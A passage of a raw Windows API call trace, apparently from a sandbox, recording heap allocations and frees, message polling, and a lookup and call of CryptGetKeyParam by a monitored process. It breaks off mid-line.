RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0128.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0128.414] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0128.415] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0128.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0128.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0128.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0128.416] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0128.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0128.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0128.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0128.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0128.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0128.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0128.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0128.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0128.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0128.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0128.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0128.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0128.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.418] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0128.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0128.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0128.420] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0128.420] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2800, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2800*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0128.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0128.422] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0128.422] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.422] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0128.423] HeapFree (in: 